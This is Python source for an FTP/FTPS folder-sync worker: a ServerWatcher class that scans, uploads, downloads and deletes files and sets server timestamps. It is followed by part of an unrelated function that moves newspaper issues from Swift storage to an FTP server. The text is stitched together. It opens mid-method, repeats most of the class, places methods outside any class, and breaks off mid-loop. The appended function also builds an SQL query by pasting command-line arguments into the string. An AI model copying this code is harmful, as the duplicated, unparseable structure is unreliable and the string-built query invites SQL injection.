            if abs(diff) < 2:
                # Let's give it a 2 seconds tolerance.
                mdtm = True
            else:
                mdtm = False
        except (ValueError, error_reply, error_perm):
            info = traceback.format_exception(*sys.exc_info())
            for i in info:
                sys.stderr.write(i)
            mdtm = False

        return mdtm

    @Slot(str)
    def onDelete(self, filename):
        # Queue a server-side delete; processed on the next checkout().
        self.deleteQueue.append(filename)

    def deleteNext(self):
        # Process a single queued delete (FIFO).
        if len(self.deleteQueue) > 0:
            next = self.deleteQueue.pop(0)
            self.deleteFile(next)

    def deleteAll(self):
        # Drain the delete queue sequentially.
        for filename in self.deleteQueue:
            self.deleteFile(filename)
        self.deleteQueue = []

    @Slot(str)
    def deleteFile(self, filename):
        """
        Deletes the file `filename` to the server

        :param filename: Absolute or relative path to the file
        """
        try:
            print 'Deleting %s' % filename
            self.ftp.delete(filename)
            return True
        except (error_reply, error_perm):
            print 'Error deleting %s' % filename
            return False
        # NOTE(review): unreachable -- both branches above return first,
        # so this completion signal is never emitted.
        self.fileEventCompleted.emit()

    @Slot(str)
    def onDownload(self, filename):
        # Queue a download; processed on the next checkout().
        self.downloadQueue.append(filename)

    def downloadNext(self):
        # Process a single queued download (FIFO).
        if len(self.downloadQueue) > 0:
            next = self.downloadQueue.pop(0)
            self.downloadFile(next)

    def downloadAll(self):
        # Drain the download queue sequentially.
        for filename in self.downloadQueue:
            self.downloadFile(filename)
        self.downloadQueue = []

    @Slot(str, str)
    def downloadFile(self, filename, localpath=None):
        """
        Performs a binary download to the file `filename` located on the
        server. `filename` parameter can be either absolute or relative,
        though it can fail for relative paths if the current directory is
        not appropiate.

        :param filename: Relative or absolute path to the file
        :param localpath: Absolute local path where the file will be saved
        """
        def handleChunk(chunk):
            """
            Receives chuncks of data downloaded from the server.
            This function is meant to be used as callback for
            the `retrbinary` method.

            :params chunk: Chunk of downloaded bytes to be written into the file
            """
            # Simply writes the received data into the file `self.downloading`
            self.downloading.write(chunk)
            self.download_progress += len(chunk)
            self.downloadProgress.emit(self.download_size, self.download_progress)

        if localpath is None:
            localpath = self.localFromServer(filename)

        localdir = os.path.dirname(localpath)
        if not os.path.exists(localdir):
            # Creates the directory if it doesn't already exists.
            os.makedirs(localdir)

        print 'Downloading: %s to %s' % (filename, localpath)
        try:
            with open(localpath, 'wb') as f:
                # Opens the file at `localname` which will hold the downloaded file.
                # Object attributes regarding download status are updated accordingly.
                self.fileEvent.emit(filename)
                self.downloading = f
                self.download_progress = 0
                self.download_size = int(self.ftp.sendcmd('SIZE %s' % filename).split(' ')[-1])
                self.ftp.retrbinary('RETR %s' % filename, handleChunk)
                print 'Download finished'

                # Let's set the same modified time to that on the server.
                with File.fromPath(filename) as downloadedfile:
                    mdate = LocalWatcher.lastModified(localpath)
                    downloadedfile.localmdate = mdate
                    downloadedfile.servermdate = mdate

                self.setLastModified(filename, mdate)

            downloaded = True
        except (IOError, OSError):
            downloaded = False
            self.ioError.emit(localpath)
        except (error_reply, error_perm) as ftperr:
            print 'Error downloading %s, %s' % (filename, ftperr)
            downloaded = False

        # TODO: Sometimes the file doesn't complete properly.
        # in that case we maybe shouldn't call this?
        self.fileEventCompleted.emit()

        return downloaded

    @Slot(str)
    def onUpload(self, filename):
        # Queue an upload; processed on the next checkout().
        self.uploadQueue.append(filename)

    def uploadNext(self):
        # Process a single queued upload (FIFO).
        if len(self.uploadQueue) > 0:
            next = self.uploadQueue.pop(0)
            self.uploadFile(next)

    def uploadAll(self):
        # Drain the upload queue sequentially.
        for filename in self.uploadQueue:
            self.uploadFile(filename)
        self.uploadQueue = []

    @Slot(str)
    def uploadFile(self, filename):
        """
        Uploads the file `filename` to the server, creating
        the needed directories.

        :param filename: Absolute or relative path to the file
        """
        def handle(buf):
            """This function is meant to be used as callback for the `storbinary` method."""
            self.upload_progress += 1024
            self.uploadProgress.emit(self.upload_size, self.upload_progress)

        # Creates the directory where the file will be uploaded to
        self.mkpath(os.path.dirname(filename))

        localpath = self.localFromServer(filename)
        print 'Uploading %s to %s' % (localpath, filename)

        try:
            # Uploads file and updates its modified date in the server
            # to match the date in the local filesystem.
            self.upload_progress = 0
            self.upload_size = os.path.getsize(localpath)
            self.fileEvent.emit(localpath)
            self.ftp.storbinary('STOR %s' % filename,
                                open(localpath, 'rb'), 1024, handle)
            print 'Upload finished'
            with File.fromPath(filename) as uploaded:
                modified = uploaded.localmdate
                uploaded.servermdate = modified

                self.setLastModified(filename, modified)

            uploaded = True
        except (IOError, OSError):
            uploaded = False
            self.ioError.emit(localpath)
        except (error_reply, error_perm, OSError) as err:
            print 'Error uploading %s, %s' % (filename, err)
            uploaded = False

        # TODO: Sometimes the file doesn't complete properly.
        # in that case we maybe shouldn't call this?
        self.fileEventCompleted.emit()

        return uploaded

    def lastModified(self, filename):
        """
        Uses the MDTM FTP command to find the last modified timestamp
        of the file `filename`.
        Returns a `datetime.datetime` object in UTC representing the file's
        last modified date and time.

        :param filename: Relative or absolute path to the file
        """
        timestamp = self.ftp.sendcmd('MDTM %s' % filename)
        if '213 ' not in timestamp:
            # Second chance was found to be needed in some cases.
            timestamp = self.ftp.sendcmd('MDTM %s' % filename)

        timestamp = timestamp.split(' ')[-1]
        # Some servers include fractional seconds in the MDTM reply.
        dateformat = '%Y%m%d%H%M%S.%f' if '.' in timestamp else '%Y%m%d%H%M%S'

        try:
            mtime = dt.strptime(timestamp, dateformat)
        except ValueError:
            # Unparseable reply -- fall back to "now" in UTC.
            mtime = dt.utcnow()

        return mtime

    def setLastModified(self, serverpath, newtime):
        """
        Uses the MFMT or MDTM FTP commands to set `newtime` as the modified
        timestamp of the file `serverpath` on the server.

        :param serverpath: Relative or absolute path to the file
        :param newtime: datedatime object holding the required time
        """
        cmds = ['MFMT', 'MDTM']
        for cmd in cmds:
            try:
                self.ftp.sendcmd(
                    '%s %s %s' % (cmd, newtime.strftime('%Y%m%d%H%M%S'), serverpath))
                return
            except (error_perm, error_reply) as e:
                if cmd == cmds[len(cmds) - 1]:
                    # If is the last comand, re-raise the exception, else
                    # keep trying.
                    raise e
                else:
                    continue

    def mkpath(self, path):
        """
        Creates the path `path` on the server by recursively
        created folders, if needed.

        :param path: Absolute path on the server to be created
        """
        try:
            self.ftp.cwd(path)
        except error_perm:
            # `cwd` call failed. Need to create some folders
            make_dir = '/'
            steps = path.split('/')
            for step in steps:
                if len(step) == 0:
                    continue
                make_dir += '%s/' % step
                try:
                    self.ftp.mkd(make_dir)
                except error_perm:
                    # Probably already exists
                    continue
        else:
            # `cwd` call succeed. No need to create
            # any folders
            self.ftp.cwd('/')
            return

    @Slot(str, str)
    def added(self, location, serverpath):
        # Reacts to a file discovered on either side; when in preemptive
        # mode, records the FileAction needed to reconcile the two sides
        # instead of acting immediately.
        super(ServerWatcher, self).added(location, serverpath)

        def actionFromPath(serverpath):
            # Decide upload vs download from the local/server mtime delta.
            f = File()
            fileExistsOnServer = True
            try:
                f.servermdate = self.lastModified(serverpath)
            except error_perm:
                fileExistsOnServer = False
                f.servermdate = 0
            f.localmdate = LocalWatcher.lastModified(self.localFromServer(serverpath))
            diff = f.timeDiff()
            action = None
            if abs(diff) > Watcher.TOLERANCE:
                if not fileExistsOnServer or diff > 0:
                    action = FileAction(serverpath, FileAction.UPLOAD, ServerWatcher.LOCATION)
                else:
                    action = FileAction(serverpath, FileAction.DOWNLOAD, LocalWatcher.LOCATION)

            return action

        if self.preemptiveCheck:
            if location == ServerWatcher.LOCATION:
                localpath = self.localFromServer(serverpath)
                if not os.path.exists(localpath):
                    # Not present locally at all -> must download.
                    action = FileAction(serverpath, FileAction.DOWNLOAD, ServerWatcher.LOCATION)
                    self.preemptiveActions.append(action)
                else:
                    action = actionFromPath(serverpath)
                    if action is not None:
                        self.preemptiveActions.append(action)
            elif location == LocalWatcher.LOCATION:
                try:
                    # SIZE doubles as an existence probe for the file.
                    self.ftp.sendcmd('SIZE %s' % serverpath)
                except (error_reply, error_perm):
                    exists = False
                else:
                    exists = True
                if not exists:
                    # Not on the server at all -> must upload.
                    action = FileAction(serverpath, FileAction.UPLOAD, LocalWatcher.LOCATION)
                    self.preemptiveActions.append(action)
                else:
                    action = actionFromPath(serverpath)
                    if action is not None:
                        self.preemptiveActions.append(action)

    @Slot(str, str)
    def changed(self, location, serverpath):
        super(ServerWatcher, self).changed(location, serverpath)

    @Slot(str, str)
    def deleted(self, location, serverpath):
        # Mark the file as no longer present on the server in the DB.
        super(ServerWatcher, self).deleted(location, serverpath)
        with File.fromPath(serverpath) as deleted:
            deleted.inserver = False
class ServerWatcher(Watcher):
    """Watches a remote FTP/FTPS directory tree and keeps it in sync with a
    local folder.

    Runs as a Qt worker: the `checkout` slot scans the server, compares each
    file's MDTM timestamp against the local database (`File` records), and
    emits `fileAdded`/`fileChanged`/`fileDeleted` signals. Upload, download
    and delete requests are queued and drained sequentially inside `checkout`
    so that all FTP commands run in the same thread.

    NOTE(review): this class is written for Python 2 (`print` statements).
    """

    # Signals reporting (total, so_far) byte counts for transfers in flight.
    downloadProgress = Signal((int, int, ))
    uploadProgress = Signal((int, int, ))
    # Si added:
    textStatus = Signal((str, ))    # human-readable status line for the UI
    fileEvent = Signal((str, ))     # emitted when a transfer starts
    fileEventCompleted = Signal()   # emitted when a transfer finishes
    loginCompleted = Signal((bool, str, ))  # (success, message)
    badFilenameFound = Signal((str, ))      # name unusable on this platform

    LOCATION = 'server'
    TEST_FILE = 'iqbox.test'

    def __init__(self, host, ssl, parent=None):
        """
        Initializes parent class and attributes. Decides whether
        to use `FTP_TLS` or `FTP` based on the `ssl` param.

        :param host: Location of the FTP server
        :param ssl: Tells whether the FTP needs to support TLS or not
        :param parent: Reference to a `QObject` instance a parent
        """
        super(ServerWatcher, self).__init__(parent)
        self.interval = 5000          # checkout poll interval, milliseconds
        self.localdir = ''
        self.deleteQueue = []
        self.downloadQueue = []
        self.uploadQueue = []
        self.warnedNames = []         # bad filenames already reported to the UI
        self.ftp = None               # created lazily in `onLogin`
        self.useSSL = ssl
        self.host = host
        self.preemptiveCheck = False
        self.preemptiveActions = []
        self.testFile = 'iqbox.test'  # NOTE(review): duplicates TEST_FILE

    @property
    def currentdir(self):
        """Returns the current working directory at the server"""
        return self.ftp.pwd()

    def setLocalDir(self, localdir):
        """
        Sets the local directory used to stored all
        downloaded files. Creates the directory if needed.

        :param localdir: Absolute path to local directory
        """
        self.localdir = localdir
        if not os.path.exists(self.localdir):
            os.makedirs(self.localdir)

    @pause_timer
    @Slot()
    def checkout(self):
        """
        Recursively checks out all files on the server, comparing each one
        against the local database and emitting added/changed/deleted
        signals. Also drains the pending delete/upload/download queues
        before scanning, so all FTP traffic stays on this thread.
        """
        # Check `self.deleteQueue`, `self.uploadQueue` and `self.downloadQueue` queues.
        # These tasks are done in queues to make sure all FTP commands
        # are done sequentially, in the same thread.
        self.deleteAll()
        self.uploadAll()
        self.downloadAll()

        # Handy list to keep track of the checkout process.
        # This list contain absolute paths only.
        checked_dirs = list()

        # Sets '/' as initial directory and initializes `downloading_dir`
        self.ftp.cwd('/')
        downloading_dir = self.currentdir
        check_date = dt.utcnow()   # scan start time; marks files seen this pass
        sidirlist = list()
        root_cached = False
        fileC = 0
        while True:
            # Gets the list of sub directories and files inside the
            # current directory `downloading_dir`.
            self.textStatus.emit('Remote scan- Downloading folder list of ' +
                                 downloading_dir + '...')
            if root_cached and downloading_dir == '/':
                # '/' is revisited every time the walk unwinds; reuse its listing.
                dir_subdirs = saved_root_dirs
                dirfiles = saved_root_files
            else:
                dir_subdirs = self.getDirs(downloading_dir)
                if downloading_dir == '/':
                    saved_root_dirs = dir_subdirs
                # sidirlist.extend(dir_subdirs)
                self.textStatus.emit('Remote scan- Downloading files list of ' +
                                     downloading_dir + '...')
                dirfiles = self.getFiles(downloading_dir)
                if downloading_dir == '/':
                    saved_root_files = dirfiles
                    root_cached = True

            # Leading '/' in `downloading_dir` breaks the `os.path.join` call
            localdir = os.path.join(self.localdir, downloading_dir[1:])
            if not os.path.exists(localdir):
                # Creates the directory if it doesn't already exists.
                os.makedirs(localdir)

            for file_ in dirfiles:
                # `serverpath` is the absolute path of the file on the server,
                # download it only if it hasn't been already downloaded
                serverpath = os.path.join(downloading_dir, file_)
                serverpath = QDir.fromNativeSeparators(serverpath)
                server_file = File.fromPath(serverpath)
                self.textStatus.emit('Scanning remote file... ' + serverpath + '...')

                # How do we know if we should check this server file?
                # We see if the date last checked is the check start time.
                if server_file.last_checked_server != check_date:
                    # Do this process only once per file

                    # Added by Simon
                    # Give feedback on scanning of files.
                    fileC += 1
                    # NOTE(review): `fileC % 1` is always 0, so this status
                    # update never fires — presumably `% 100 == 0` was meant;
                    # confirm intent before changing.
                    if fileC % 1 == 2:
                        self.textStatus.emit('Scanning remote files for changes, ' +
                                             str(fileC) + ' files scanned.')

                    # STEP: IS THIS THE FIRST TIME WE SAW THE FILE, OR WAS IT ALREADY IN OUR DB?
                    just_added = not server_file.inserver

                    # STEP: IF ITS A NEW FILE, ENSURE WE DONT WANT TO SKIP IT
                    # Example: If it's a temporary file, or a Unix file with a name we don't support.
                    if just_added:
                        filename = os.path.basename(serverpath)
                        if platform.system() == 'Windows':
                            # These characters cannot appear in Windows
                            # filenames, so the file could never be saved locally.
                            badName = False
                            for chr in ['\\', '/', ':', '?', '"', '<', '>', '|']:
                                if chr in filename:
                                    badName = True
                                    break
                            if badName:
                                if filename not in self.warnedNames:
                                    self.warnedNames.append(filename)
                                    self.badFilenameFound.emit(filename)
                                continue

                    # STEP: ASSUMING THE FILE DID EXIST IN OUR DB, LETS SAVE THE LAST MODIFICATION DATE
                    lastmdate = server_file.servermdate

                    # STEP: SAVE THE MOD DATE TO A VARIABLE
                    # Now we get the last mod time.
                    # We expect this to work fine since this file
                    # was found on the server
                    servermdate = self.lastModified(serverpath)

                    # STEP: SET BOOL SHOWING THAT IT WAS ON THE SERVER, SINCE WE KNOW IT IS.
                    server_file.inserver = True

                    # STEP: SET THE TIME THE FILE WAS LAST CHECKED TO THE SCAN START TIME
                    server_file.last_checked_server = check_date

                    # STEP: SET THE MOD DATE IN THE DATABASE TO THE ONE WE JUST GOT
                    server_file.servermdate = servermdate

                    # STEP: SAVE THIS CHANGE TO THE DATABASE
                    server_file.session.commit()

                    delta = 0
                    if server_file.inlocal:
                        delta = server_file.timeDiff()

                    # Emit the signals after the attributes has been set and committed
                    if just_added is True:
                        self.fileAdded.emit(ServerWatcher.LOCATION, serverpath)
                    elif server_file.servermdate > lastmdate or delta < -Watcher.TOLERANCE:
                        self.fileChanged.emit(ServerWatcher.LOCATION, serverpath, False)
            #END FOR

            self.textStatus.emit('Remote scan- Finding next folder...')
            dir_ready = True
            for dir_ in dir_subdirs:
                # `dirpath` is the absolute path of the subdirectory on the server,
                dirpath = QDir.fromNativeSeparators(os.path.join(downloading_dir, dir_))
                # `downloading_dir` is ready only when all its subdirectory are on the
                # `checked_dirs` list.
                if dirpath not in checked_dirs:
                    # Found one subdirectory that is not on `checked_dirs`,
                    # will process it in the next iteration.
                    downloading_dir = dirpath
                    dir_ready = False
                    break

            if dir_ready is True:
                # All subdirectories of `downloading_dir` are already in `checked_dirs`
                if downloading_dir == '/':
                    # All directories ready and at '/', means checkout is complete
                    # So, exit the main While loop!!
                    break
                else:
                    # Not at '/'. Current directory is ready so is appended to `checked_dirs`
                    # Back one directory to find directories that are not in `checked_dirs`
                    checked_dirs.append(downloading_dir)
                    downloading_dir = os.path.dirname(downloading_dir)
                    self.textStatus.emit('Remote scan- Found Folder...')
        ##### END OF WHILE ################

        ###################################################################
        # Deleted files are the ones whose `last_checked_server` attribute
        # didn't get updated in the recursive run.
        session = Session()
        deleted = session.query(File).filter(
            File.last_checked_server < check_date).filter(File.inserver == True)
        for file_ in deleted:
            self.fileDeleted.emit(ServerWatcher.LOCATION, file_.path)

        # Wraps up the checkout process, commits to the database.
        session.commit()

    @Slot()
    def onLogin(self, username, passwd):
        """
        Connects (lazily creating `FTP_TLS` or `FTP` per `self.useSSL`) and
        logs in, then runs write-permission and MFMT capability tests.
        Emits `loginCompleted(ok, msg)` with the outcome.
        """
        ok = True
        msg = ''
        error_msg = 'Login failed.'
        try:
            if not self.ftp:
                self.ftp = FTP_TLS(self.host) if self.useSSL is True else FTP(self.host)
            loginResponse = self.ftp.login(username, passwd)
        except socket.gaierror:
            # Host name didn't resolve; drop the half-built connection.
            self.ftp = None
            ok = False
            msg = 'Server address could not be found.'
        except (error_perm, error_reply):
            info = traceback.format_exception(*sys.exc_info())
            for i in info:
                sys.stderr.write(i)
            ok = False
            msg = error_msg
        else:
            # '230' is the FTP "user logged in" reply code.
            if '230' in loginResponse:
                ok = True
            else:
                ok = False
                msg = error_msg

        if ok:
            # Logged in. Now let's do compability tests.
            if not self.testPermissions():
                # User doesn't have write permissions, don't bother doing next test.
                ok = False
                msg = 'It seems like you do not have write access to this server.'
            else:
                # Permissions test passed, now let's test MFMT for timestamp modification.
                if not self.testMFMT():
                    ok = False
                    msg = 'This server does not support timestamp modification\n \
need by this application.'
        self.loginCompleted.emit(ok, msg)

    def getFiles(self, path):
        """
        This method simply wraps the `nlst` method with an exception handler,
        and returns an empty list in case an exception is caught.

        :param path: Relative or absolute path on the server
        """
        try:
            nlst = self.ftp.nlst(path)
            dirs = self.getDirs(path)
            # Files are items in nlst that are not in dirs
            files = [item for item in nlst if os.path.basename(item) not in dirs]
            return files
        except:
            # NOTE(review): message says `getDirs` but this is `getFiles` —
            # copy-paste; also a bare `except:` hides even KeyboardInterrupt.
            print 'Exception in ServerWatcher.getDirs'
            info = traceback.format_exception(*sys.exc_info())
            for i in info:
                sys.stderr.write(i)
            return []

    def getDirs(self, path):
        """
        Retrieves a list of the directories inside `path`,
        uses `retrlines` and the LIST command to retrieve the items.

        :param path: Relative or absolute path on the server
        """
        dirs = list()

        def handleLine(line):
            """
            Recieves a line from the LIST command.
            This function is meant to be used as callback for the `retrlines` method.

            :params line: Line from the LIST command
            """
            if line.startswith('d'):
                # Only lines starting with 'd' are directories
                # Parse the directory out of the line; lines look like:
                # 'drwxrwxrwx   1 user     group           0 Jun 15  2012 dirname'
                # NOTE(review): the fixed column 55 is server/format specific —
                # confirm it holds for this server's LIST output.
                dirname = line[55:].strip()
                if dirname != '.' and dirname != '..':
                    # Ignoring '.' and '..' entries
                    dirs.append(dirname)

        try:
            self.ftp.retrlines('LIST %s' % path, handleLine)
            return dirs
        except:
            print 'Exception in ServerWatcher.getDirs'
            info = traceback.format_exception(*sys.exc_info())
            for i in info:
                sys.stderr.write(i)
            return []

    @upload_test
    def testPermissions(self):
        # For interface purposes. upload_test takes care of everything.
        return True

    @upload_test
    def testMFMT(self):
        """Checks whether the server honours MFMT/MDTM timestamp changes."""
        # Absurd date to test whether the change really happened.
        time = dt.utcfromtimestamp(100000000)
        try:
            self.setLastModified(self.testFile, time)
            otherTime = self.lastModified(self.testFile)
            diff = (time - otherTime).total_seconds()
            if abs(diff) < 2:
                # Let's give it a 2 seconds tolerance.
                mdtm = True
            else:
                mdtm = False
        except (ValueError, error_reply, error_perm):
            info = traceback.format_exception(*sys.exc_info())
            for i in info:
                sys.stderr.write(i)
            mdtm = False
        return mdtm

    @Slot(str)
    def onDelete(self, filename):
        # Queue a server-side delete; executed on the next `checkout` pass.
        self.deleteQueue.append(filename)

    def deleteNext(self):
        # Pop and delete a single queued file (FIFO).
        if len(self.deleteQueue) > 0:
            next = self.deleteQueue.pop(0)
            self.deleteFile(next)

    def deleteAll(self):
        # Drain the whole delete queue.
        for filename in self.deleteQueue:
            self.deleteFile(filename)
        self.deleteQueue = []

    @Slot(str)
    def deleteFile(self, filename):
        """
        Deletes the file `filename` to the server

        :param filename: Absolute or relative path to the file
        """
        try:
            print 'Deleting %s' % filename
            self.ftp.delete(filename)
            return True
        except (error_reply, error_perm):
            print 'Error deleting %s' % filename
            return False
        # NOTE(review): unreachable — both branches above return first.
        self.fileEventCompleted.emit()

    @Slot(str)
    def onDownload(self, filename):
        # Queue a download; executed on the next `checkout` pass.
        self.downloadQueue.append(filename)

    def downloadNext(self):
        # Pop and download a single queued file (FIFO).
        if len(self.downloadQueue) > 0:
            next = self.downloadQueue.pop(0)
            self.downloadFile(next)

    def downloadAll(self):
        # Drain the whole download queue.
        for filename in self.downloadQueue:
            self.downloadFile(filename)
        self.downloadQueue = []

    @Slot(str, str)
    def downloadFile(self, filename, localpath=None):
        """
        Performs a binary download to the file `filename` located on the
        server. `filename` parameter can be either absolute or relative,
        though it can fail for relative paths if the current directory
        is not appropiate.

        :param filename: Relative or absolute path to the file
        :param localpath: Absolute local path where the file will be saved
        """

        def handleChunk(chunk):
            """
            Receives chuncks of data downloaded from the server.
            This function is meant to be used as callback for the
            `retrbinary` method.

            :params chunk: Chunk of downloaded bytes to be written into the file
            """
            # Simply writes the received data into the file `self.downloading`
            self.downloading.write(chunk)
            self.download_progress += len(chunk)
            self.downloadProgress.emit(self.download_size, self.download_progress)

        if localpath is None:
            localpath = self.localFromServer(filename)
        localdir = os.path.dirname(localpath)
        if not os.path.exists(localdir):
            # Creates the directory if it doesn't already exists.
            os.makedirs(localdir)
        print 'Downloading: %s to %s' % (filename, localpath)
        try:
            with open(localpath, 'wb') as f:
                # Opens the file at `localname` which will hold the downloaded file.
                # Object attributes regarding download status are updated accordingly.
                self.fileEvent.emit(filename)
                self.downloading = f
                self.download_progress = 0
                self.download_size = int(self.ftp.sendcmd('SIZE %s' % filename).split(' ')[-1])
                self.ftp.retrbinary('RETR %s' % filename, handleChunk)
                print 'Download finished'
                # Let's set the same modified time to that on the server.
                with File.fromPath(filename) as downloadedfile:
                    mdate = LocalWatcher.lastModified(localpath)
                    downloadedfile.localmdate = mdate
                    downloadedfile.servermdate = mdate
                self.setLastModified(filename, mdate)
            downloaded = True
        except (IOError, OSError):
            downloaded = False
            self.ioError.emit(localpath)
        except (error_reply, error_perm) as ftperr:
            print 'Error downloading %s, %s' % (filename, ftperr)
            downloaded = False
        # TODO: Sometimes the file doesn't complete properly.
        # in that case we maybe shouldn't call this?
        self.fileEventCompleted.emit()
        return downloaded

    @Slot(str)
    def onUpload(self, filename):
        # Queue an upload; executed on the next `checkout` pass.
        self.uploadQueue.append(filename)

    def uploadNext(self):
        # Pop and upload a single queued file (FIFO).
        if len(self.uploadQueue) > 0:
            next = self.uploadQueue.pop(0)
            self.uploadFile(next)

    def uploadAll(self):
        # Drain the whole upload queue.
        for filename in self.uploadQueue:
            self.uploadFile(filename)
        self.uploadQueue = []

    @Slot(str)
    def uploadFile(self, filename):
        """
        Uploads the file `filename` to the server, creating
        the needed directories.

        :param filename: Absolute or relative path to the file
        """

        def handle(buf):
            """This function is meant to be used as callback for the `storbinary` method."""
            # NOTE(review): assumes every callback delivers a full 1024-byte
            # block; the final short block overstates progress slightly.
            self.upload_progress += 1024
            self.uploadProgress.emit(self.upload_size, self.upload_progress)

        # Creates the directory where the file will be uploaded to
        self.mkpath(os.path.dirname(filename))
        localpath = self.localFromServer(filename)
        print 'Uploading %s to %s' % (localpath, filename)
        try:
            # Uploads file and updates its modified date in the server
            # to match the date in the local filesystem.
            self.upload_progress = 0
            self.upload_size = os.path.getsize(localpath)
            self.fileEvent.emit(localpath)
            # NOTE(review): this file handle is never closed explicitly.
            self.ftp.storbinary('STOR %s' % filename, open(localpath, 'rb'), 1024, handle)
            print 'Upload finished'
            with File.fromPath(filename) as uploaded:
                modified = uploaded.localmdate
                uploaded.servermdate = modified
                self.setLastModified(filename, modified)
            uploaded = True
        except (IOError, OSError):
            uploaded = False
            self.ioError.emit(localpath)
        # NOTE(review): OSError is already caught above, so listing it here
        # again is dead; only error_reply/error_perm reach this handler.
        except (error_reply, error_perm, OSError) as err:
            print 'Error uploading %s, %s' % (filename, err)
            uploaded = False
        # TODO: Sometimes the file doesn't complete properly.
        # in that case we maybe shouldn't call this?
        self.fileEventCompleted.emit()
        return uploaded

    def lastModified(self, filename):
        """
        Uses the MDTM FTP command to find the last modified timestamp
        of the file `filename`.
        Returns a `datetime.datetime` object in UTC representing the file's
        last modified date and time.

        :param filename: Relative or absolute path to the file
        """
        timestamp = self.ftp.sendcmd('MDTM %s' % filename)
        if '213 ' not in timestamp:
            # Second chance was found to be needed in some cases.
            timestamp = self.ftp.sendcmd('MDTM %s' % filename)
        timestamp = timestamp.split(' ')[-1]
        dateformat = '%Y%m%d%H%M%S.%f' if '.' in timestamp else '%Y%m%d%H%M%S'
        try:
            mtime = dt.strptime(timestamp, dateformat)
        except ValueError:
            # Unparseable reply; fall back to "now" rather than crash.
            mtime = dt.utcnow()
        return mtime

    def setLastModified(self, serverpath, newtime):
        """
        Uses the MFMT or MDTM FTP commands to set `newtime` as the modified
        timestamp of the file `serverpath` on the server.

        :param serverpath: Relative or absolute path to the file
        :param newtime: datedatime object holding the required time
        """
        cmds = ['MFMT', 'MDTM']
        for cmd in cmds:
            try:
                self.ftp.sendcmd('%s %s %s' % (cmd, newtime.strftime('%Y%m%d%H%M%S'), serverpath))
                return
            except (error_perm, error_reply) as e:
                if cmd == cmds[len(cmds) - 1]:
                    # If is the last comand, re-raise the exception, else
                    # keep trying.
                    raise e
                else:
                    continue

    def mkpath(self, path):
        """
        Creates the path `path` on the server by recursively
        created folders, if needed.

        :param path: Absolute path on the server to be created
        """
        try:
            self.ftp.cwd(path)
        except error_perm:
            # `cwd` call failed. Need to create some folders
            make_dir = '/'
            steps = path.split('/')
            for step in steps:
                if len(step) == 0:
                    continue
                make_dir += '%s/' % step
                try:
                    self.ftp.mkd(make_dir)
                except error_perm:
                    # Probably already exists
                    continue
        else:
            # `cwd` call succeed. No need to create
            # any folders
            self.ftp.cwd('/')
            return

    @Slot(str, str)
    def added(self, location, serverpath):
        """Handles a new-file notification; may queue a preemptive sync action."""
        super(ServerWatcher, self).added(location, serverpath)

        def actionFromPath(serverpath):
            # Decide upload vs download by comparing server and local mtimes.
            f = File()
            fileExistsOnServer = True
            try:
                f.servermdate = self.lastModified(serverpath)
            except error_perm:
                fileExistsOnServer = False
                f.servermdate = 0
            f.localmdate = LocalWatcher.lastModified(self.localFromServer(serverpath))
            diff = f.timeDiff()
            action = None
            if abs(diff) > Watcher.TOLERANCE:
                if not fileExistsOnServer or diff > 0:
                    action = FileAction(serverpath, FileAction.UPLOAD, ServerWatcher.LOCATION)
                else:
                    action = FileAction(serverpath, FileAction.DOWNLOAD, LocalWatcher.LOCATION)
            return action

        if self.preemptiveCheck:
            if location == ServerWatcher.LOCATION:
                localpath = self.localFromServer(serverpath)
                if not os.path.exists(localpath):
                    action = FileAction(serverpath, FileAction.DOWNLOAD, ServerWatcher.LOCATION)
                    self.preemptiveActions.append(action)
                else:
                    action = actionFromPath(serverpath)
                    if action is not None:
                        self.preemptiveActions.append(action)
            elif location == LocalWatcher.LOCATION:
                # SIZE doubles as an existence probe for the server copy.
                try:
                    self.ftp.sendcmd('SIZE %s' % serverpath)
                except (error_reply, error_perm):
                    exists = False
                else:
                    exists = True
                if not exists:
                    action = FileAction(serverpath, FileAction.UPLOAD, LocalWatcher.LOCATION)
                    self.preemptiveActions.append(action)
                else:
                    action = actionFromPath(serverpath)
                    if action is not None:
                        self.preemptiveActions.append(action)

    @Slot(str, str)
    def changed(self, location, serverpath):
        super(ServerWatcher, self).changed(location, serverpath)

    @Slot(str, str)
    def deleted(self, location, serverpath):
        # Record in the database that the server copy is gone.
        super(ServerWatcher, self).deleted(location, serverpath)
        with File.fromPath(serverpath) as deleted:
            deleted.inserver = False
def ftp_upload():
    """Transfer newly-mounted newspaper issues from OpenStack Swift to the
    Access Innovations FTP server.

    Queries `peel_blitz.newspapers` for unmounted issues of the newspapers
    named on the command line, downloads each issue's tar files from Swift
    into a scratch folder, uploads them to the per-language ``separate``
    folder on the FTP server, and logs successes/failures plus a running
    progress report.

    Relies on module-level configuration and helpers defined elsewhere in
    this file (``ftp_address``, ``language_abbrev_map``, ``try_make_dir``,
    ``compare_size``, ``swift_login``, the colorized ``print`` wrapper, ...).
    """
    # Generate a temp folder, make sure the folder not in use.
    # FIX: '~' must be expanded explicitly — subprocess does not invoke a
    # shell, so `mkdir "~/temp_..."` would not resolve the home directory.
    while True:
        temp_folder = os.path.expanduser("~/temp_" + str(uuid4()))
        if not os.path.isdir(temp_folder):
            break
    subprocess.run(["mkdir", temp_folder])

    # Connect to FTP server of the Access Innovations.
    # USER/PASS are sent as raw commands rather than via login().
    ftps = FTP_TLS()
    ftps.connect(ftp_address)
    ftps.sendcmd(f"USER {ftp_username}")
    ftps.sendcmd(f"PASS {ftp_password}")
    ftps.cwd(ftp_upload_folder)

    # Generate language folders (with combined/separate subfolders).
    for language in language_abbrev_map.values():
        try_make_dir(ftps, language)
        try_make_dir(ftps, f"{language}/combined")
        try_make_dir(ftps, f"{language}/separate")

    # Get noids: fetch every issue that still needs to be transmitted.
    cnx = connect(host=db_address, database=db_database, user=db_username,
                  password=db_password, port=db_port, charset='utf8',
                  use_pure=True)
    cursor = cnx.cursor()
    # Count number of newspapers that need to transmit
    query = (f"SELECT noid, newspaper, year, month, day, language FROM peel_blitz.newspapers WHERE newspaper IN "
             + f" {tuple(sys.argv[1:] + [''])} AND noid IS NOT NULL AND mounted = 0")
    cursor.execute(query)
    temp_sql_result = cursor.fetchall()
    cnx.close()

    start_time = datetime.datetime.now()
    previous_time = start_time
    fail_count = 0
    finish_count = 0
    skip_count = 0
    total = len(temp_sql_result)

    # Resolve issues happening on the same day: append a per-day counter to
    # each row so upload folder names stay unique.
    counter_dict = dict()
    for i, data in enumerate(temp_sql_result):
        noid, news_abbrev, year, month, day, language = data
        upload_folder_name = "%s-%d%02d%02d" % (news_abbrev, year, month, day)
